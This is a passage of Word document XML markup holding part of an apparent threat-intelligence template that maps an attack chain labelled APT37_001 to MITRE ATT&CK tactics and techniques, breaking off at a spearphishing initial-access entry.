              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="500F0D14" w14:textId="2F682BEA" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C759F11" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00B857D7" w14:paraId="2587FCE9" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59BCC23B" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39744127" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BF44857" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="312C9035" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C9131D3" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09313F0D" w14:textId="5A467C93" w:rsidR="00873778" w:rsidRDefault="006B75BF" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="414C8F91"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4396A444" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15A515A0" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="793B62D4" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="764B58B2" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00B857D7" w14:paraId="52602F21" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CFE3F2C" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CA7497" w14:textId="46F87DD3" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="00603F4B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21E7BD91" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="77"/>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00B857D7" w14:paraId="73851C9D" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EFCDB74" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="557BE282" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CAD6840" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54A7AA2C" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="00AC7A85" w:rsidRDefault="005F312C" w:rsidP="005F312C"/>
    <w:p w14:paraId="3F382CA1" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="005F312C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1402"/>
        <w:gridCol w:w="2293"/>
        <w:gridCol w:w="641"/>
        <w:gridCol w:w="616"/>
        <w:gridCol w:w="556"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="3516"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F3C19" w:rsidRPr="002D1D50" w14:paraId="0C393D24" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="691503BD" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="78" w:name="OLE_LINK12"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="663D4F09" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="590E0341" w14:textId="7A4F29BE" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT37_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="099FBF8A" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5083CC53" w14:textId="69B17529" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6B427905" w14:textId="57E891DD" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7029B218" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0AA23789" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="002D1D50" w14:paraId="44039016" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AEB54AA" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="011BB549" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F06557D" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="510A5714" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14BB883A" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7965CEB7" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51B844C8" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="253381B4" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="002D1D50" w14:paraId="5F01C188" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57BB7096" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CDB071A" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09AC5DC5" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34960291" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79ED50C2" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20402BBF" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58DB0F3C" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66E44A42" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E34A89" w:rsidRPr="00E34A89" w14:paraId="56BBFA0F" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58856617" w14:textId="4834FE37" w:rsidR="002F7B21" w:rsidRPr="00E34A89" w:rsidRDefault="002F7B21" w:rsidP="002F7B21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10AA6A88" w14:textId="340958F4" w:rsidR="002F7B21" w:rsidRPr="00E34A89" w:rsidRDefault="002F7B21" w:rsidP="002F7B21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74C5A5A4" w14:textId="6DABA3E9" w:rsidR="002F7B21" w:rsidRPr="00E34A89" w:rsidRDefault="002F7B21" w:rsidP="002F7B21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1566.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
